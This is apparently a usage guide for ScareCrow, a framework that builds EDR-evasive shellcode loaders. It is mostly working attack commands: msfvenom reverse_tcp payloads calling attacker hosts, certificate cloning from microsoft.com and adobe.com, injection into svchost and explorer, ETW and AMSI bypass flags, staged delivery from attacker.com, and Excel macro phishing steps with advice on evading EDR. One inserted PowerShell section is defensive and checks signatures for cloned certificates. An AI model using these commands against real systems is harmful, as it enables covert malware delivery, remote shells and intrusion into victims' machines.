# ScareCrow

ScareCrow is a payload creation framework designed to generate EDR-evasive loaders that bypass detection through code signing, process injection, and advanced execution techniques. Built by Optiv, it supports multiple delivery mechanisms and loader types for flexible red team operations.
## Installation

### Prerequisites

```bash
# Install required dependencies (Debian/Ubuntu)
sudo apt-get install mingw-w64 osslsigncode openssl golang-go

# On macOS
brew install mingw-w64 osslsigncode openssl go

# On CentOS/RHEL
sudo yum install mingw-w64-gcc mingw-w64-gcc-c++ openssl golang
```

### Build from Source

```bash
# Clone ScareCrow repository
git clone https://github.com/optiv/ScareCrow.git
cd ScareCrow

# Build the binary (requires Go 1.16+)
go build -o ScareCrow main.go

# Verify installation
./ScareCrow -h
```

### Quick Install via Go

```bash
# Install directly to $GOPATH/bin
go install github.com/optiv/ScareCrow@latest

# Add to PATH if needed
export PATH=$PATH:$(go env GOPATH)/bin
```
## Quick Start

Generate a basic loader from msfvenom shellcode:

```bash
# Generate shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw > payload.bin

# Create signed loader
./ScareCrow -I payload.bin -domain microsoft.com -delivery http

# Output files created:
# - loader.exe (main loader)
# - loader.exe.sig (signature)
# - loader.c (C source code)
```
## Loader Types

| Type | Flag | Description | Best For |
|---|---|---|---|
| Binary | `-Loader binary` | Standalone executable | Direct execution, reverse shells |
| DLL | `-Loader dll` | Dynamic library for sideloading | DLL injection, process hollowing |
| COM Object | `-Loader control` | COM control object (.scr) | Screensaver execution, UAC bypass |
| Excel Macro | `-Loader excel` | Excel-based delivery | Phishing documents, macro execution |
| MSIExec | `-Loader msiexec` | Windows Installer wrapper | Code execution via MSI, UAC bypass |
| WScript | `-Loader wscript` | Windows Script Host wrapper | VBScript/JScript execution, LOLBin abuse |

### DLL Side-Loading Example

```bash
# Create DLL for side-loading
./ScareCrow -I payload.bin -Loader dll -domain adobe.com -delivery http

# Use legitimate application to load malicious DLL
# Place loader.dll next to legitimate application
# When legitimate app runs, it loads our malicious DLL
```

### Excel Macro Delivery

```bash
# Generate Excel-compatible loader
./ScareCrow -I payload.bin -Loader excel -domain microsoft.com

# Creates VBA macro that executes loader
# Can be embedded in .xls/.xlsm documents
```
## Input Formats

### Raw Shellcode Input

```bash
# Using -I flag for raw binary shellcode
./ScareCrow -I payload.bin -domain company.com

# Generate from various shellcode sources
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 -f raw > payload.bin
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=8080 -f raw > shell.bin
```

### Metasploit Integration

```bash
# Generate shellcode directly from msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 \
  -f raw | ./ScareCrow -I /dev/stdin -domain microsoft.com

# For 32-bit payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=target.com LPORT=4444 \
  -f raw > x86.bin && ./ScareCrow -I x86.bin
```

### Cobalt Strike Shellcode

```bash
# Export from Cobalt Strike beacon
# Generate raw shellcode from beacon export
./ScareCrow -I beacon.bin -domain cloud.microsoft.com -delivery http
```
## Code Signing

### Domain-Based Certificate Cloning

```bash
# Sign with cloned certificate from domain
./ScareCrow -I payload.bin -domain microsoft.com -valid 365

# ScareCrow clones legitimate certificate from specified domain
# Creates trusted signature that bypasses SmartScreen

# Alternative domains for cloning:
# microsoft.com, apple.com, adobe.com, google.com, github.com
```

### Certificate Options

```bash
# Sign without specific domain (self-signed)
./ScareCrow -I payload.bin

# Specify validity period (days)
./ScareCrow -I payload.bin -domain adobe.com -valid 90

# Use custom certificate (if available)
./ScareCrow -I payload.bin -domain company.com
```

### Why Code Signing Matters

Signed loaders bypass numerous defenses:

- SmartScreen warning suppression
- Code signature validation in EDRs
- Windows Defender Application Guard bypass
- Trust indicators in file properties
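The defender-side check that goes with this section, as an added example that is not part of ScareCrow or this page: a cloned certificate copies the subject fields of the real domain certificate but is issued by ScareCrow itself, so an Authenticode chain built from it does not terminate at a trusted root. The sweep path under `Downloads` and the `RevocationMode` setting are assumptions for an offline triage host.

```powershell
# Added example (not ScareCrow code): triage a binary's Authenticode signature and
# report whether the signing certificate chains to a trusted root. A "cloned"
# certificate looks right in the Subject field but is self-issued, so Status is
# not Valid and the chain does not build.
function Get-SignatureTriage {
    param([Parameter(Mandatory)][string]$Path)

    $sig  = Get-AuthenticodeSignature -FilePath $Path
    $cert = $sig.SignerCertificate

    $subject = $null; $issuer = $null; $selfIssued = $false
    $chainOk = $false; $chainErrors = @()

    if ($cert) {
        $subject    = $cert.Subject
        $issuer     = $cert.Issuer
        $selfIssued = ($cert.Subject -eq $cert.Issuer)

        $chain = New-Object System.Security.Cryptography.X509Certificates.X509Chain
        # Assumption: offline triage host, so skip revocation lookups; use 'Online' on a connected host.
        $chain.ChainPolicy.RevocationMode = 'NoCheck'
        $chainOk     = $chain.Build($cert)
        $chainErrors = $chain.ChainStatus | ForEach-Object { $_.Status.ToString() }
    }

    [pscustomobject]@{
        Path          = $Path
        Status        = $sig.Status          # Valid, NotSigned, UnknownError, ...
        StatusMessage = $sig.StatusMessage
        Subject       = $subject
        Issuer        = $issuer
        SelfIssued    = $selfIssued
        ChainTrusted  = $chainOk
        ChainErrors   = ($chainErrors -join ', ')
    }
}

# Sweep a folder (assumed location) and surface every PE whose signature is not
# Valid or whose certificate is self-issued, however legitimate the Subject looks.
Get-ChildItem -Path "$env:USERPROFILE\Downloads" -Include *.exe,*.dll,*.scr -Recurse |
    ForEach-Object { Get-SignatureTriage -Path $_.FullName } |
    Where-Object { $_.Status -ne 'Valid' -or $_.SelfIssued } |
    Format-Table Path, Status, SelfIssued, Subject, Issuer -AutoSize
```

A file that reports a well-known vendor in `Subject` while `SelfIssued` is true or `ChainTrusted` is false is exactly the pattern a cloned-certificate loader produces, and is worth escalating even though file properties show a signature.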
## Encryption

### Encryption Modes

```bash
# AES-256 encryption (default, recommended)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode AES

# ELZMA compression + encryption (smaller file size)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode ELZMA

# XOR encryption (fastest, less secure)
./ScareCrow -I payload.bin -encryptionmode XOR
```

### File Size Comparison

```bash
# AES: ~180KB (best compatibility)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode AES

# ELZMA: ~120KB (compressed)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode ELZMA

# XOR: ~140KB (fast)
./ScareCrow -I payload.bin -encryptionmode XOR
```
## Process Injection

### Injection Techniques

```bash
# Self-injection (no parent process)
./ScareCrow -I payload.bin -injection self -domain microsoft.com

# Parent process injection (masquerade as another process)
./ScareCrow -I payload.bin -injection process -process svchost.exe

# Target specific process for injection
./ScareCrow -I payload.bin -injection process -process notepad.exe
```

### Process Injection Tactics

```bash
# Inject into legitimate system processes
./ScareCrow -I payload.bin -injection process -process svchost.exe -domain microsoft.com
./ScareCrow -I payload.bin -injection process -process taskhostw.exe -domain adobe.com
./ScareCrow -I payload.bin -injection process -process explorer.exe -domain apple.com

# Self-injection for standalone execution
./ScareCrow -I payload.bin -injection self -domain microsoft.com
```

### Process Selection Tips

- `svchost.exe` - System service host (trusted)
- `taskhostw.exe` - Task Scheduler host (legitimate)
- `explorer.exe` - Windows Explorer (common)
- `winlogon.exe` - Logon process (high privilege)
- `lsass.exe` - Local Security Authority (protected)
## Delivery Options

### HTTP Delivery

```bash
# Remote URL retrieval
./ScareCrow -I payload.bin -delivery http -url http://attacker.com/loader.exe \
  -domain microsoft.com

# Staged delivery - loader downloads payload from URL
./ScareCrow -I payload.bin -delivery http
```

### DNS Delivery

```bash
# DNS-based payload retrieval
./ScareCrow -I payload.bin -delivery dns -domain attacker.com

# Useful in restricted networks where HTTP is blocked
# Requires DNS exfiltration/command infrastructure
```

### URL-Based Delivery

```bash
# Specify custom delivery URL
./ScareCrow -I payload.bin -url http://internal.corp/updates/loader.exe \
  -delivery http -domain microsoft.com

# File will be downloaded from specified URL at runtime
```

### No Internet Delivery

```bash
# Embed payload directly (no remote retrieval)
./ScareCrow -I payload.bin -domain microsoft.com

# Useful for offline or isolated environments
```
## EDR Evasion Techniques

### ETW (Event Tracing for Windows) Patching

```bash
# Disable ETW logging
./ScareCrow -I payload.bin -domain microsoft.com -noetw

# Prevents Event Tracing for Windows from logging execution
# Avoids triggering ETW-based detection rules
```

### AMSI Bypass

```bash
# Bypass AMSI (Antimalware Scan Interface)
./ScareCrow -I payload.bin -domain microsoft.com -noamsi

# Allows shellcode execution without AMSI scanning
# Particularly effective for PowerShell/VBS payloads
```

### Sleep Obfuscation

```bash
# Obfuscate Sleep calls to evade timeout detection
./ScareCrow -I payload.bin -domain microsoft.com -nosleep

# Sleep API is hooked by many EDRs
# Obfuscation prevents detection of sleep patterns
```

### Combined Evasion

```bash
# Maximum evasion configuration
./ScareCrow -I payload.bin -domain microsoft.com \
  -noetw -noamsi -nosleep -encryptionmode AES

# Combines multiple evasion techniques
# Most effective against modern EDR solutions
```

### Additional Evasion

- Direct syscall execution (bypasses hooked APIs)
- Unhooking kernel32 functions
- Hardware breakpoint detection bypass
- Sandbox evasion checks
- Timing-based detection avoidance
## Advanced Options

### Custom Passwords

```bash
# Use custom encryption password
./ScareCrow -I payload.bin -password "SecurePass123!" -domain microsoft.com

# Password-protects the generated loader
```

### Console Output Control

```bash
# Show console window during execution
./ScareCrow -I payload.bin -console -domain microsoft.com

# Hide console (default for stealthy execution)
./ScareCrow -I payload.bin -domain microsoft.com
```

### Sandbox Evasion

```bash
# Enable sandbox evasion checks
./ScareCrow -I payload.bin -domain microsoft.com

# Detects and avoids common sandbox environments
# Checks for: VirtualBox, VMware, Hyper-V, QEMU
```

### File Output Control

```bash
# Specify custom output filename
./ScareCrow -I payload.bin -out custom_loader.exe -domain microsoft.com

# Change output directory
./ScareCrow -I payload.bin -o /tmp/output/ -domain microsoft.com
```
## Complete Workflow Examples

### Cobalt Strike Integration

```bash
# 1. Generate Cobalt Strike shellcode
# Export beacon -> generate shellcode -> save as cs.bin

# 2. Create ScareCrow loader
./ScareCrow -I cs.bin -domain microsoft.com -delivery http \
  -injection process -process svchost.exe -noetw -noamsi

# 3. Host on web server
# Place loader.exe on HTTP server

# 4. Deliver via social engineering
# Email, USB, shared drive, etc.
```

### Sliver Integration

```bash
# 1. Generate Sliver implant shellcode
sliver > generate --mtls localhost --format shellcode > sliver.bin

# 2. Create loader
./ScareCrow -I sliver.bin -domain apple.com -encryptionmode ELZMA \
  -injection self -noetw

# 3. Execute on target
# ./loader.exe (connects back to Sliver server)
```

### Metasploit Multi-Stage

```bash
# 1. Generate msfvenom shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 \
  LPORT=4444 -f raw > msfvenom.bin

# 2. Create signed loader
./ScareCrow -I msfvenom.bin -domain adobe.com -delivery http \
  -injection process -process explorer.exe -nosleep

# 3. Set up Metasploit listener
# use exploit/multi/handler
# set LHOST 10.10.10.10
# set LPORT 4444
# exploit
```

### Excel-Based Phishing

```bash
# 1. Generate payload
./ScareCrow -I payload.bin -Loader excel -domain microsoft.com

# 2. Create Excel document
# Insert generated macro into Excel

# 3. Social engineer target
# Send as email attachment, mention "Enable Macros"
```
## Troubleshooting

### Build Errors

```bash
# Missing Go installation
# Solution: Install Go 1.16+ from golang.org

# Cannot find mingw-w64
# Solution: apt-get install mingw-w64

# openssl not found
# Solution: apt-get install openssl
```

### Compilation Failures

```bash
# "Invalid argument" error
# Solution: Check shellcode validity - ensure raw binary format

# "Certificate error" when signing
# Solution: Verify domain is reachable and has a valid certificate

# File generation issues
# Solution: Check write permissions in current directory
```

### Payload Execution Issues

```bash
# Loader doesn't execute
# Solution: Verify shellcode format, try different injection method

# EDR blocking execution
# Solution: Enable -noetw -noamsi -nosleep flags

# Process injection fails
# Solution: Ensure target process exists, use -injection self as fallback
```

### Size Issues

```bash
# Loader too large (> 10MB)
# Solution: Use -encryptionmode ELZMA to compress

# Output binary still detected
# Solution: Recombine with fresh domain signing, change encryption mode
```
## Best Practices

### Operational Security

- Always use code signing with legitimate-looking domains
- Rotate domains between campaigns
- Test payloads in isolated lab environment first
- Monitor for detection patterns on target systems
- Use staged delivery when network allows

### Evasion Strategy

- Combine multiple evasion techniques (`-noetw`, `-noamsi`, `-nosleep`)
- Vary loader types between targets
- Use process injection into trusted system processes
- Implement sleep obfuscation for long-running operations
- Test against target's specific EDR solution

### Payload Selection

- Match shellcode size to target constraints
- Use x64 when possible (64-bit Windows is default)
- Consider network bandwidth for large payloads
- Test callback connectivity before deployment
- Plan for multiple payload attempts

### Post-Exploitation

- Monitor injected process for suspicious behavior
- Use encrypted communications for C2
- Implement proper logging and audit trails
- Clean up artifacts after operation completion
- Document all activities for IR purposes
## Related Tools

| Tool | Purpose | Use Case |
|---|---|---|
| Donut | Shellcode generation from .NET | .NET assembly execution |
| PEzor | PE obfuscation and evasion | Binary obfuscation |
| Freeze | Anti-debug and anti-analysis | Detection evasion |
| NimCrypt2 | Nim-based encryption | Alternative language approach |
| shhhloader | Shellcode loader framework | Custom loader development |
| Sliver | C2 framework alternative | Command and control |
| Cobalt Strike | Commercial C2 framework | Full-featured red team operations |

### Complementary Techniques

- Use with Atomic Red Team for evasion testing
- Combine with LOLBAS for execution
- Integrate with Covenant C2 framework
- Pair with Mimikatz for credential theft
- Deploy alongside Empire/PowerEmpire